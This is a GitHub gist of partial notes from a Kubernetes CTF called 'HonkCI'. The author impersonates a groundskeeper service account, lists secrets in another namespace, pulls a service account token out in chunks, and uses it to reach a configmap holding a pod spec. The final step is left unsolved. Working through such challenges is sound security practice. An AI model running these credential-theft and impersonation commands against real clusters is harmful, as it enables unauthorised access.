Skip to content

Instantly share code, notes, and snippets.

@jnaulty
Created June 6, 2020 02:59
Show Gist options
  • Save jnaulty/d0e06b2b74717a0bd839a89340b0aba9 to your computer and use it in GitHub Desktop.
Save jnaulty/d0e06b2b74717a0bd839a89340b0aba9 to your computer and use it in GitHub Desktop.
Attempt at the March Honk CTF. Honk!

HonkCI Challenge

March 21, 2020

What namespaces exist?

!honkctl get ns

default              Active   84s
garden               Active   61s
home                 Active   61s
kube-node-lease      Active   85s
kube-public          Active   85s
kube-system          Active   85s
local-path-storage   Active   75s
mod

Do any custom resources exist?

!honkctl get crds

NAME     TODO
todo-1   Steal the groundskeepers keys.
todo-2   Get to the Pub.
todo-3   Get into the model-village.
todo-4   Steal the beautiful minature golden bell.
todo-5   ...and take it all the way back home.

Looks like the game is here.

Todo-1

Describing the first todo:

!honkctl describe todo todo-1

The hints are part of the spec:

!honkctl get todo todo-1 -o=jsonpath='{.spec.hint}'

Todo-2

Assume the groundskeeper and get into the pub namespace

!honkctl get pods --as system:serviceaccount:garden:groundskeeper -n pub

The pods have service accounts!

!honkctl get secrets --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath='{range .items[*]}{.metadata.name}{"|"}{end}'

Empty the pub's pockets (aka, get their service accounts):

!honkctl get secrets --as system:serviceaccount:garden:groundskeeper -n pub -o jsonpath='{range.items[*]}{.metadata.name}{"|"}{end}'

Get the token, to run the !honkctl --token=<TOKEN>

Todo-3

A burly man can be somewhat grizzly. To get the burly-man token, we first get the secret name for the serviceAccount secret. When the exfiltrate the base64 token value for that secret.

The honkctl slack app only shows around 250 characters, and a service token defaults to about 1200.

!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c1-250
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c251-500
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c501-750
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c751-1000
!honkctl get secret default-token-dtcrs --as system:serviceaccount:garden:groundskeeper -n pub -o
jsonpath={".data.token"} | cut -c1001-1250

Taking a look around, there's only a configmmap with the name bell...which is exactly what we were looking for

!honkctl --token $TOKEN get cm bell -n model-village -o json

Todo-4

The configmap data reveals a pod object.

!honkctl --token $TOKEN get cm bell -n model-village -o jsonpath={".data.bell\\.yaml"}
apiVersion: v1
kind: Pod
metadata:
  name: bell
  namespace: home
  annotations:
    description: "A beautiful golden bell."
  labels:
    beautiful: 'true'
spec:
  containers:
  - name: bell
    image: mrbobbytables/bell:latest
    ports:
    - containerPort: 80

The challenge seems to be to get this container to run in the home namespace.

I've tried to

  • copy the configmap to any namespace
!honkctl --token $TOKEN get  cm bell -n model-village -o yaml | kubectl --token $TOKEN -n home apply -f -
  • apply the pod spec to the home namespace
!honkctl --token $TOKEN get cm --export bell -n model-village -o jsonpath={".data.bell\\.yaml"} | kubectl --token $TOKEN apply -f -

Todo-5

I don't really know how to create anything in that namespace.

@jnaulty
Copy link
Author

jnaulty commented Jun 6, 2020

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment